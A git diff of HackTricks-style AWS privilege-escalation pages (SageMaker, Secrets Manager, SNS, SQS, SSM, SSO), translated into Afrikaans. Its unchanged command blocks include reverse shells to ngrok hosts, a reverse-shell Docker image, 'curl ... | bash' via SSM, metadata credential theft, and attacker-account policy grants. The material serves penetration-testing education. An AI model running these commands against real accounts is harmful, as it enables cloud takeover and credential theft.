-If there are Jupyter **notebooks are already running** on it and you can list them with `sagemaker:ListNotebookInstances` (or discover them in any other way). You can **generate a URL for them, access them, and steal the credentials as indicated in the previous technique**.
-
+As daar Jupyter **notebooks reeds aan die gang is** daarop en jy kan hulle lys met `sagemaker:ListNotebookInstances` (of hulle op enige ander manier ontdek). Jy kan **'n URL vir hulle genereer, toegang tot hulle verkry, en die geloofsbriewe steel soos aangedui in die vorige tegniek**.
 ```bash
 aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name <name>
 ```
-
-**Potential Impact:** Privesc to the sagemaker service role attached.
+**Potensiële Impak:** Privesc na die sagemaker diensrol wat aangeheg is.
 
 ### `sagemaker:CreateProcessingJob,iam:PassRole`
 
-An attacker with those permissions can make **sagemaker execute a processingjob** with a sagemaker role attached to it. The attacked can indicate the definition of the container that will be run in an **AWS managed ECS account instance**, and **steal the credentials of the IAM role attached**.
-
+'n Aanvaller met daardie toestemmings kan **sagemaker 'n verwerkingswerk** laat uitvoer met 'n sagemaker rol wat daaraan geheg is. Die aanvaller kan die definisie van die houer aandui wat in 'n **AWS bestuurde ECS rekening instance** uitgevoer sal word, en **die geloofsbriewe van die aangehegte IAM rol steel**.
 ```bash
 # I uploaded a python docker image to the ECR
 aws sagemaker create-processing-job \
-    --processing-job-name privescjob \
-    --processing-resources '{"ClusterConfig": {"InstanceCount": 1,"InstanceType": "ml.t3.medium","VolumeSizeInGB": 50}}' \
-    --app-specification "{\"ImageUri\":\"<id>.dkr.ecr.eu-west-1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \
-    --role-arn <sagemaker-arn-role>
+--processing-job-name privescjob \
+--processing-resources '{"ClusterConfig": {"InstanceCount": 1,"InstanceType": "ml.t3.medium","VolumeSizeInGB": 50}}' \
+--app-specification "{\"ImageUri\":\"<id>.dkr.ecr.eu-west-1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \
+--role-arn <sagemaker-arn-role>
 
 # In my tests it took 10min to receive the shell
 curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" #To get the creds
 ```
-
-**Potential Impact:** Privesc to the sagemaker service role specified.
+**Potensiële Impak:** Privesc na die sagemaker diensrol wat gespesifiseer is.
 
 ### `sagemaker:CreateTrainingJob`, `iam:PassRole`
 
-An attacker with those permissions will be able to create a training job, **running an arbitrary container** on it with a **role attached** to it. Therefore, the attcke will be able to steal the credentials of the role.
+'n Aanvaller met daardie toestemmings sal in staat wees om 'n opleidingswerk te skep, **wat 'n arbitrêre houer** daarop laat loop met 'n **rol wat daaraan geheg is**. Daarom sal die aanvaller in staat wees om die akrediteer van die rol te steel.
 
 > [!WARNING]
-> This scenario is more difficult to exploit than the previous one because you need to generate a Docker image that will send the rev shell or creds directly to the attacker (you cannot indicate a starting command in the configuration of the training job).
+> Hierdie scenario is moeiliker om te benut as die vorige een omdat jy 'n Docker beeld moet genereer wat die rev shell of creds direk na die aanvaller sal stuur (jy kan nie 'n beginopdrag in die konfigurasie van die opleidingswerk aandui nie).
 >
 > ```bash
-> # Create docker image
+> # Skep docker beeld
 > mkdir /tmp/rev
-> ## Note that the trainning job is going to call an executable called "train"
-> ## That's why I'm putting the rev shell in /bin/train
-> ## Set the values of <YOUR-IP-OR-DOMAIN> and <YOUR-PORT>
+> ## Let daarop dat die opleidingswerk 'n uitvoerbare genaamd "train" gaan aanroep
+> ## Daarom plaas ek die rev shell in /bin/train
+> ## Stel die waardes van <YOUR-IP-OR-DOMAIN> en <YOUR-PORT>
 > cat > /tmp/rev/Dockerfile <<EOF
 > FROM ubuntu
 > RUN apt update && apt install -y ncat curl
@@ -79,40 +71,34 @@ An attacker with those permissions will be able to create a training job, **runn
 > cd /tmp/rev
 > sudo docker build . -t reverseshell
 >
-> # Upload it to ECR
+> # Laai dit op na ECR
 > sudo docker login -u AWS -p $(aws ecr get-login-password --region <region>) <id>.dkr.ecr.<region>.amazonaws.com/<repo>
 > sudo docker tag reverseshell:latest <account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest
 > sudo docker push <account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest
 > ```
-
 ```bash
 # Create trainning job with the docker image created
 aws sagemaker create-training-job \
-    --training-job-name privescjob \
-    --resource-config '{"InstanceCount": 1,"InstanceType": "ml.m4.4xlarge","VolumeSizeInGB": 50}' \
-    --algorithm-specification '{"TrainingImage":"<account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell", "TrainingInputMode": "Pipe"}' \
-    --role-arn <role-arn> \
-    --output-data-config '{"S3OutputPath": "s3://<bucket>"}' \
-    --stopping-condition '{"MaxRuntimeInSeconds": 600}'
+--training-job-name privescjob \
+--resource-config '{"InstanceCount": 1,"InstanceType": "ml.m4.4xlarge","VolumeSizeInGB": 50}' \
+--algorithm-specification '{"TrainingImage":"<account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell", "TrainingInputMode": "Pipe"}' \
+--role-arn <role-arn> \
+--output-data-config '{"S3OutputPath": "s3://<bucket>"}' \
+--stopping-condition '{"MaxRuntimeInSeconds": 600}'
 
 #To get the creds
 curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
 ## Creds env var value example:/v2/credentials/proxy-f00b92a68b7de043f800bd0cca4d3f84517a19c52b3dd1a54a37c1eca040af38-customer
 ```
-
-**Potential Impact:** Privesc to the sagemaker service role specified.
+**Potensiële Impak:** Privesc na die sagemaker diensrol gespesifiseer.
 
 ### `sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole`
 
-An attacker with those permissions will (potentially) be able to create an **hyperparameter training job**, **running an arbitrary container** on it with a **role attached** to it.\
-&#xNAN;_&#x49; haven't exploited because of the lack of time, but looks similar to the previous exploits, feel free to send a PR with the exploitation details._
+'n Aanvaller met daardie toestemmings sal (potensieel) in staat wees om 'n **hyperparameter opleidingswerk** te skep, **'n arbitrêre houer** daarop te laat loop met 'n **rol aangeheg** daaraan.\
+&#xNAN;_&#x49; het nie uitgebuit nie weens die gebrek aan tyd, maar dit lyk soortgelyk aan die vorige uitbuitings, voel vry om 'n PR met die uitbuitingsbesonderhede te stuur._
 
-## References
+## Verwysings
 
 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md
index bdc01433b..d3ef36d44 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md
@@ -4,7 +4,7 @@
 
 ## Secrets Manager
 
-For more info about secrets manager check:
+Vir meer inligting oor secrets manager, kyk:
 
 {{#ref}}
 ../aws-services/aws-secrets-manager-enum.md
@@ -12,44 +12,34 @@ For more info about secrets manager check:
 
 ### `secretsmanager:GetSecretValue`
 
-An attacker with this permission can get the **saved value inside a secret** in AWS **Secretsmanager**.
-
+'n Aanvaller met hierdie toestemming kan die **gestoor waarde binne 'n geheim** in AWS **Secretsmanager** verkry.
 ```bash
 aws secretsmanager get-secret-value --secret-id <secret_name> # Get value
 ```
-
-**Potential Impact:** Access high sensitive data inside AWS secrets manager service.
+**Potensiële Impak:** Toegang tot hoogs sensitiewe data binne die AWS secrets manager diens.
 
 ### `secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`)
 
-With the previous permissions it's possible to **give access to other principals/accounts (even external)** to access the **secret**. Note that in order to **read secrets encrypted** with a KMS key, the user also needs to have **access over the KMS key** (more info in the [KMS Enum page](../aws-services/aws-kms-enum.md)).
-
+Met die vorige toestemmings is dit moontlik om **toegang te gee aan ander principals/rekeninge (selfs eksterne)** om die **geheim** te bekom. Let daarop dat om **geheime wat met 'n KMS-sleutel versleut is** te **lees**, die gebruiker ook **toegang tot die KMS-sleutel** moet hê (meer inligting op die [KMS Enum bladsy](../aws-services/aws-kms-enum.md)).
 ```bash
 aws secretsmanager list-secrets
 aws secretsmanager get-resource-policy --secret-id <secret_name>
 aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json
 ```
-
-policy.json:
-
+beleid.json:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "arn:aws:iam::<attackers_account>:root"
-      },
-      "Action": "secretsmanager:GetSecretValue",
-      "Resource": "*"
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::<attackers_account>:root"
+},
+"Action": "secretsmanager:GetSecretValue",
+"Resource": "*"
+}
+]
 }
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md
index 699bb58cf..a43e89386 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md
@@ -4,7 +4,7 @@
 
 ## SNS
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-sns-enum.md
@@ -12,36 +12,26 @@ For more information check:
 
 ### `sns:Publish`
 
-An attacker could send malicious or unwanted messages to the SNS topic, potentially causing data corruption, triggering unintended actions, or exhausting resources.
-
+'n Aanvaller kan kwaadwillige of ongewenste boodskappe na die SNS-tema stuur, wat moontlik datakorruptie kan veroorsaak, onbedoelde aksies kan ontketen, of hulpbronne kan uitput.
 ```bash
 aws sns publish --topic-arn <value> --message <value>
 ```
-
-**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion.
+**Potensiële Impak**: Kwetsbaarheid benutting, Data korrupsie, onbedoelde aksies, of hulpbron uitputting.
 
 ### `sns:Subscribe`
 
-An attacker could subscribe or to an SNS topic, potentially gaining unauthorized access to messages or disrupting the normal functioning of applications relying on the topic.
-
+'n Aanvaller kan inteken op 'n SNS onderwerp, wat moontlik ongeoorloofde toegang tot boodskappe verleen of die normale funksionering van toepassings wat op die onderwerp staatmaak, ontwrig.
 ```bash
 aws sns subscribe --topic-arn <value> --protocol <value> --endpoint <value>
 ```
-
-**Potential Impact**: Unauthorized access to messages (sensitve info), service disruption for applications relying on the affected topic.
+**Potensiële Impak**: Onbevoegde toegang tot boodskappe (sensitiewe inligting), diensonderbreking vir toepassings wat op die betrokke onderwerp staatmaak.
 
 ### `sns:AddPermission`
 
-An attacker could grant unauthorized users or services access to an SNS topic, potentially getting further permissions.
-
+'n Aanvaller kan onbevoegde gebruikers of dienste toegang tot 'n SNS-onderwerp verleen, wat moontlik verdere toestemmings kan verkry.
 ```css
 aws sns add-permission --topic-arn <value> --label <value> --aws-account-id <value> --action-name <value>
 ```
-
-**Potential Impact**: Unauthorized access to the topic, message exposure, or topic manipulation by unauthorized users or services, disruption of normal functioning for applications relying on the topic.
+**Potensiële Impak**: Onbevoegde toegang tot die onderwerp, boodskapblootstelling, of onderwerp manipulasie deur onbevoegde gebruikers of dienste, onderbreking van normale funksionering vir toepassings wat op die onderwerp staatmaak.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md
index 384ed8430..54beb5022 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md
@@ -4,7 +4,7 @@
 
 ## SQS
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-sqs-and-sns-enum.md
@@ -12,39 +12,29 @@ For more information check:
 
 ### `sqs:AddPermission`
 
-An attacker could use this permission to grant unauthorized users or services access to an SQS queue by creating new policies or modifying existing policies. This could result in unauthorized access to the messages in the queue or manipulation of the queue by unauthorized entities.
-
+'n Aanvaller kan hierdie toestemming gebruik om ongemagtigde gebruikers of dienste toegang tot 'n SQS-ry te gee deur nuwe beleide te skep of bestaande beleide te wysig. Dit kan lei tot ongemagtigde toegang tot die boodskappe in die ry of manipulasie van die ry deur ongemagtigde entiteite.
 ```bash
 cssCopy codeaws sqs add-permission --queue-url <value> --actions <value> --aws-account-ids <value> --label <value>
 ```
-
-**Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services.
+**Potensiële Impak**: Onbevoegde toegang tot die lys, boodskap blootstelling, of lys manipulasie deur onbevoegde gebruikers of dienste.
 
 ### `sqs:SendMessage` , `sqs:SendMessageBatch`
 
-An attacker could send malicious or unwanted messages to the SQS queue, potentially causing data corruption, triggering unintended actions, or exhausting resources.
-
+'n Aanvaller kan kwaadwillige of ongewenste boodskappe na die SQS-lys stuur, wat moontlik data korrupsie kan veroorsaak, onbedoelde aksies kan ontketen, of hulpbronne kan uitput.
 ```bash
 aws sqs send-message --queue-url <value> --message-body <value>
 aws sqs send-message-batch --queue-url <value> --entries <value>
 ```
-
-**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion.
+**Potensiële Impak**: Kwetsbaarheid benutting, Data korrupsie, onbedoelde aksies, of hulpbron uitputting.
 
 ### `sqs:ReceiveMessage`, `sqs:DeleteMessage`, `sqs:ChangeMessageVisibility`
 
-An attacker could receive, delete, or modify the visibility of messages in an SQS queue, causing message loss, data corruption, or service disruption for applications relying on those messages.
-
+'n Aanvaller kan boodskappe in 'n SQS-ry ontvang, verwyder of die sigbaarheid van boodskappe verander, wat kan lei tot boodskapverlies, datakorrupsie, of diensonderbreking vir toepassings wat op daardie boodskappe staatmaak.
 ```bash
 aws sqs receive-message --queue-url <value>
 aws sqs delete-message --queue-url <value> --receipt-handle <value>
 aws sqs change-message-visibility --queue-url <value> --receipt-handle <value> --visibility-timeout <value>
 ```
-
-**Potential Impact**: Steal sensitive information, Message loss, data corruption, and service disruption for applications relying on the affected messages.
+**Potensiële Impak**: Steel sensitiewe inligting, Boodskapverlies, datakorruptie, en diensonderbreking vir toepassings wat op die geraakte boodskappe staatmaak.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md
index c4067e2ca..4f40bf7d5 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md
@@ -4,7 +4,7 @@
 
 ## SSM
 
-For more info about SSM check:
+Vir meer inligting oor SSM, kyk:
 
 {{#ref}}
 ../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
@@ -12,8 +12,7 @@ For more info about SSM check:
 
 ### `ssm:SendCommand`
 
-An attacker with the permission **`ssm:SendCommand`** can **execute commands in instances** running the Amazon SSM Agent and **compromise the IAM Role** running inside of it.
-
+'n Aanvaller met die toestemming **`ssm:SendCommand`** kan **opdragte uitvoer in instansies** wat die Amazon SSM Agent draai en **die IAM Rol** wat binne dit loop, **kompromitteer**.
 ```bash
 # Check for configured instances
 aws ssm describe-instance-information
@@ -21,26 +20,22 @@ aws ssm describe-sessions --state Active
 
 # Send rev shell command
 aws ssm send-command --instance-ids "$INSTANCE_ID" \
-   --document-name "AWS-RunShellScript" --output text \
-   --parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash"
+--document-name "AWS-RunShellScript" --output text \
+--parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash"
 ```
-
-In case you are using this technique to escalate privileges inside an already compromised EC2 instance, you could just capture the rev shell locally with:
-
+In die geval dat jy hierdie tegniek gebruik om voorregte te verhoog binne 'n reeds gecompromitteerde EC2-instansie, kan jy net die rev shell plaaslik vang met:
 ```bash
 # If you are in the machine you can capture the reverseshel inside of it
 nc -lvnp 4444 #Inside the EC2 instance
 aws ssm send-command --instance-ids "$INSTANCE_ID" \
-   --document-name "AWS-RunShellScript" --output text \
-   --parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash"
+--document-name "AWS-RunShellScript" --output text \
+--parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash"
 ```
-
-**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running.
+**Potensiële Impak:** Direkte privesc na die EC2 IAM rolle wat aan lopende instansies met SSM Agents gekoppel is.
 
 ### `ssm:StartSession`
 
-An attacker with the permission **`ssm:StartSession`** can **start a SSH like session in instances** running the Amazon SSM Agent and **compromise the IAM Role** running inside of it.
-
+'n Aanvaller met die toestemming **`ssm:StartSession`** kan **'n SSH-agtige sessie in instansies** wat die Amazon SSM Agent draai, **begin en die IAM Rol** wat binne dit loop, **kompromitteer**.
 ```bash
 # Check for configured instances
 aws ssm describe-instance-information
@@ -49,68 +44,58 @@ aws ssm describe-sessions --state Active
 # Send rev shell command
 aws ssm start-session --target "$INSTANCE_ID"
 ```
-
 > [!CAUTION]
-> In order to start a session you need the **SessionManagerPlugin** installed: [https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html](https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html)
+> Om 'n sessie te begin, moet jy die **SessionManagerPlugin** geïnstalleer hê: [https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html](https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html)
 
-**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running.
+**Potensiële Impak:** Direkte privesc na die EC2 IAM rolle wat aan lopende instansies met SSM Agents gekoppel is.
 
-#### Privesc to ECS
-
-When **ECS tasks** run with **`ExecuteCommand` enabled** users with enough permissions can use `ecs execute-command` to **execute a command** inside the container.\
-According to [**the documentation**](https://aws.amazon.com/blogs/containers/new-using-amazon-ecs-exec-access-your-containers-fargate-ec2/) this is done by creating a secure channel between the device you use to initiate the “_exec_“ command and the target container with SSM Session Manager. (SSM Session Manager Plugin necesary for this to work)\
-Therefore, users with `ssm:StartSession` will be able to **get a shell inside ECS tasks** with that option enabled just running:
+#### Privesc na ECS
 
+Wanneer **ECS take** met **`ExecuteCommand` geaktiveer** loop, kan gebruikers met genoeg regte `ecs execute-command` gebruik om **'n opdrag** binne die houer uit te voer.\
+Volgens [**die dokumentasie**](https://aws.amazon.com/blogs/containers/new-using-amazon-ecs-exec-access-your-containers-fargate-ec2/) word dit gedoen deur 'n veilige kanaal te skep tussen die toestel wat jy gebruik om die “_exec_“ opdrag te begin en die teikenhouer met SSM Session Manager. (SSM Session Manager Plugin is nodig vir dit om te werk)\
+Daarom sal gebruikers met `ssm:StartSession` in staat wees om **'n shell binne ECS take** te verkry met daardie opsie geaktiveer deur net te loop:
 ```bash
 aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID"
 ```
-
 ![](<../../../images/image (185).png>)
 
-**Potential Impact:** Direct privesc to the `ECS`IAM roles attached to running tasks with `ExecuteCommand` enabled.
+**Potensiële Impak:** Direkte privesc na die `ECS` IAM rolle wat aan lopende take met `ExecuteCommand` geaktiveer is, geheg is.
 
 ### `ssm:ResumeSession`
 
-An attacker with the permission **`ssm:ResumeSession`** can re-**start a SSH like session in instances** running the Amazon SSM Agent with a **disconnected** SSM session state and **compromise the IAM Role** running inside of it.
-
+'n Aanvaller met die toestemming **`ssm:ResumeSession`** kan 'n **SSH-agtige sessie in instances** wat die Amazon SSM Agent draai met 'n **afgekoppelde** SSM sessietoestand herbegin en **die IAM Rol** wat binne dit draai, kompromitteer.
 ```bash
 # Check for configured instances
 aws ssm describe-sessions
 
 # Get resume data (you will probably need to do something else with this info to connect)
 aws ssm resume-session \
-    --session-id Mary-Major-07a16060613c408b5
+--session-id Mary-Major-07a16060613c408b5
 ```
-
-**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running and disconected sessions.
+**Potensiële Impak:** Direkte privesc na die EC2 IAM rolle wat aan lopende instansies met SSM Agents wat loop en ontkoppelde sessies geheg is.
 
 ### `ssm:DescribeParameters`, (`ssm:GetParameter` | `ssm:GetParameters`)
 
-An attacker with the mentioned permissions is going to be able to list the **SSM parameters** and **read them in clear-text**. In these parameters you can frequently **find sensitive information** such as SSH keys or API keys.
-
+'n Aanvaller met die genoemde toestemmings gaan in staat wees om die **SSM parameters** te lys en **dit in duidelike teks te lees**. In hierdie parameters kan jy dikwels **sensitiewe inligting** soos SSH sleutels of API sleutels vind.
 ```bash
 aws ssm describe-parameters
 # Suppose that you found a parameter called "id_rsa"
 aws ssm get-parameters --names id_rsa --with-decryption
 aws ssm get-parameter --name id_rsa --with-decryption
 ```
-
-**Potential Impact:** Find sensitive information inside the parameters.
+**Potensiële Impak:** Vind sensitiewe inligting binne die parameters.
 
 ### `ssm:ListCommands`
 
-An attacker with this permission can list all the **commands** sent and hopefully find **sensitive information** on them.
-
+'n Aanvaller met hierdie toestemming kan al die **opdragte** lys wat gestuur is en hoopvol **sensitiewe inligting** daarop vind.
 ```
 aws ssm list-commands
 ```
-
-**Potential Impact:** Find sensitive information inside the command lines.
+**Potensiële Impak:** Vind sensitiewe inligting binne die opdraglyne.
 
 ### `ssm:GetCommandInvocation`, (`ssm:ListCommandInvocations` | `ssm:ListCommands`)
 
-An attacker with these permissions can list all the **commands** sent and **read the output** generated hopefully finding **sensitive information** on it.
-
+'n Aanvaller met hierdie toestemmings kan al die **opdragte** lys wat gestuur is en **die uitvoer** lees wat gegenereer is, in die hoop om **sensitiewe inligting** daarop te vind.
 ```bash
 # You can use any of both options to get the command-id and instance id
 aws ssm list-commands
@@ -118,19 +103,14 @@ aws ssm list-command-invocations
 
 aws ssm get-command-invocation --command-id <cmd_id> --instance-id <i_id>
 ```
-
-**Potential Impact:** Find sensitive information inside the output of the command lines.
+**Potensiële Impak:** Vind sensitiewe inligting binne die uitvoer van die opdraglyne.
 
 ### Codebuild
 
-You can also use SSM to get inside a codebuild project being built:
+Jy kan ook SSM gebruik om binne 'n codebuild projek wat gebou word, te kom:
 
 {{#ref}}
 aws-codebuild-privesc.md
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md
index 0fb4e10a1..9967e41fa 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md
@@ -4,58 +4,53 @@
 
 ## AWS Identity Center / AWS SSO
 
-For more information about AWS Identity Center / AWS SSO check:
+Vir meer inligting oor AWS Identity Center / AWS SSO kyk:
 
 {{#ref}}
 ../aws-services/aws-iam-enum.md
 {{#endref}}
 
 > [!WARNING]
-> Note that by **default**, only **users** with permissions **form** the **Management Account** are going to be able to access and **control the IAM Identity Center**.\
-> Users from other accounts can only allow it if the account is a **Delegated Adminstrator.**\
-> [Check the docs for more info.](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html)
+> Let daarop dat slegs **gebruikers** met **toestemmings** van die **Bestuursrekening** toegang sal hê tot en **beheer oor die IAM Identity Center** sal hê.\
+> Gebruikers van ander rekeninge kan dit slegs toelaat as die rekening 'n **Gedelegeerde Administrateur** is.\
+> [Kyk die dokumentasie vir meer inligting.](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html)
 
-### ~~Reset Password~~
+### ~~Reset Wagtwoord~~
 
-An easy way to escalate privileges in cases like this one would be to have a permission that allows to reset users passwords. Unfortunately it's only possible to send an email to the user to reset his password, so you would need access to the users email.
+'n Maklike manier om voorregte te verhoog in gevalle soos hierdie, sou wees om 'n toestemming te hê wat toelaat om gebruikers se wagwoorde te reset. Ongelukkig is dit slegs moontlik om 'n e-pos aan die gebruiker te stuur om sy wagwoord te reset, so jy sal toegang tot die gebruiker se e-pos nodig hê.
 
 ### `identitystore:CreateGroupMembership`
 
-With this permission it's possible to set a user inside a group so he will inherit all the permissions the group has.
-
+Met hierdie toestemming is dit moontlik om 'n gebruiker binne 'n groep te plaas sodat hy al die toestemmings wat die groep het, sal erf.
 ```bash
 aws identitystore create-group-membership --identity-store-id <tore-id> --group-id <group-id> --member-id UserId=<user-id>
 ```
-
 ### `sso:PutInlinePolicyToPermissionSet`, `sso:ProvisionPermissionSet`
 
-An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control
-
+'n Aanvaller met hierdie toestemming kan ekstra toestemmings toeken aan 'n Toestemmingstel wat aan 'n gebruiker onder sy beheer toegeken is.
 ```bash
 # Set an inline policy with admin privileges
 aws sso-admin put-inline-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --inline-policy file:///tmp/policy.yaml
 
 # Content of /tmp/policy.yaml
 {
-	"Version": "2012-10-17",
-	"Statement": [
-		{
-			"Sid": "Statement1",
-			"Effect": "Allow",
-			"Action": ["*"],
-			"Resource": ["*"]
-		}
-	]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Sid": "Statement1",
+"Effect": "Allow",
+"Action": ["*"],
+"Resource": ["*"]
+}
+]
 }
 
 # Update the provisioning so the new policy is created in the account
 aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS
 ```
-
 ### `sso:AttachManagedPolicyToPermissionSet`, `sso:ProvisionPermissionSet`
 
-An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control
-
+'n Aanvaller met hierdie toestemming kan ekstra toestemmings toeken aan 'n Toestemmingstel wat aan 'n gebruiker onder sy beheer toegeken is.
 ```bash
 # Set AdministratorAccess policy to the permission set
 aws sso-admin attach-managed-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess"
@@ -63,14 +58,12 @@ aws sso-admin attach-managed-policy-to-permission-set --instance-arn <instance-a
 # Update the provisioning so the new policy is created in the account
 aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS
 ```
-
 ### `sso:AttachCustomerManagedPolicyReferenceToPermissionSet`, `sso:ProvisionPermissionSet`
 
-An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control.
+'n Aanvaller met hierdie toestemming kan ekstra toestemmings toeken aan 'n Toestemmingstel wat aan 'n gebruiker onder sy beheer toegeken is.
 
 > [!WARNING]
-> To abuse these permissions in this case you need to know the **name of a customer managed policy that is inside ALL the accounts** that are going to be affected.
-
+> Om hierdie toestemmings in hierdie geval te misbruik, moet jy die **naam van 'n klantbestuurde beleid weet wat binne AL die rekeninge is** wat geraak gaan word.
 ```bash
 # Set AdministratorAccess policy to the permission set
 aws sso-admin attach-customer-managed-policy-reference-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --customer-managed-policy-reference <customer-managed-policy-name>
@@ -78,59 +71,42 @@ aws sso-admin attach-customer-managed-policy-reference-to-permission-set --insta
 # Update the provisioning so the new policy is created in the account
 aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS
 ```
-
 ### `sso:CreateAccountAssignment`
 
-An attacker with this permission could give a Permission Set to a user under his control to an account.
-
+'n Aanvaller met hierdie toestemming kan 'n Toestemmingstel aan 'n gebruiker onder sy beheer toeken aan 'n rekening.
 ```bash
 aws sso-admin create-account-assignment --instance-arn <instance-arn> --target-id <account_num> --target-type AWS_ACCOUNT --permission-set-arn <permission_set_arn> --principal-type USER --principal-id <principal_id>
 ```
-
 ### `sso:GetRoleCredentials`
 
-Returns the STS short-term credentials for a given role name that is assigned to the user.
-
+Gee die STS korttermyn geloofsbriewe vir 'n gegewe rolnaam wat aan die gebruiker toegeken is.
 ```
 aws sso get-role-credentials --role-name <value> --account-id <value> --access-token <value>
 ```
-
 However, you need an access token that I'm not sure how to get (TODO).
 
 ### `sso:DetachManagedPolicyFromPermissionSet`
 
-An attacker with this permission can remove the association between an AWS managed policy from the specified permission set. It is possible to grant more privileges via **detaching a managed policy (deny policy)**.
-
+'n Aanvaller met hierdie toestemming kan die assosiasie tussen 'n AWS bestuurde beleid en die gespesifiseerde toestemmingstel verwyder. Dit is moontlik om meer voorregte toe te ken deur **'n bestuurde beleid (weier beleid)** te ontkoppel.
 ```bash
 aws sso-admin detach-managed-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN> --managed-policy-arn <ManagedPolicyARN>
 ```
-
